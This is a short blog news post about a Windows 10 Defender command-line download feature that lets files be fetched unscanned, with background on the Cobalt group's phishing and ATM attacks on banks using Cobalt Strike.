After the may update of Windows 10, the antivirus built into the operating system received a completely original and potentially dangerous feature – namely, the ability to download files from both the local network and the Internet via the command line.

 

 

After conducting a security study of this function, it turned out that it was possible to download a file that the antivirus would not have missed – that is, the built-in antivirus does not check the downloaded files…

 

Thus, a security expert (Mohammad Askar) was able to download “Cobalt Strike” (SOFTWARE designed to test system protection) in this way (via the download function in the Windows Defender command line).

Initially, the Cobalt Strike program is designed for conducting penetration tests. It includes a multifunctional Trojan Beacon, which is the main “payload” and provides extensive opportunities for remote management of systems. The attackers used it to install a program in ATMs that interacts with their XFS framework and gives the command to issue cash.

In 2017, 21 attacks were carried out on Russian banks using the Cobalt Strike program, 11 of them were successful. 240 credit institutions were hit, from which the criminals managed to steal 1.156 billion rubles.

The Cobalt Strike program gave its name to the Cobalt group, which has been known since 2016 and specializes in cyber attacks on banks, exchanges, insurance companies and investment funds in order to steal money. Suppliers and contractors of financial organizations have also been hit: criminals use their infrastructure and accounts of real employees to send phishing emails. This approach provided a high level of trust for recipients and helped avoid being blocked by filtering systems on mail servers.

Cybercriminals used unsuspicious email topics, content and names of attachments: “procedure for determining the amount of penalties”, “Invoice for servicing your ATMs”, “documents for signature”, “balance Reconciliation”. The emails sent contained various malicious attachments: a document with an exploit (. doc, .rtf,. xls), an archive with an executable dropper file (. exe,. scr), an archive with an LNK file.

 

To ensure that the presence of malware in the network was not detected immediately, the criminals acted mainly at night, cleaned up their tracks, deleting data, and actively using legal programs for implementation and distribution: Ammyy Admin, TeamViewer, Mimikatz, PsExec, SoftPerfect Network Scanner.

 

According to the REGNUM news Agency, – it is unlikely that the developers have added a feature for PC users to download viruses from the network in this way, but this possibility exists and it seems that it was added to Windows 10 at the time of the next OS update in July 2020.

 

Also, IA REGNUM gave information that Microsoft has disabled the ability to disable “Windows Defender”. This change also occurred after the last (in may 2020) update of Windows 10.

 

Previously, it was possible to disable “Windows Defender” permanently when making changes to the registry, but at this time, Microsoft said that this is an “outdated parameter”.

Leave a Reply

Your email address will not be published. Required fields are marked *

GPD Host Contacts
GPD Host Social
Pay with Confidence

Copyright © 2015 - 2020 GPD Host All right reserved.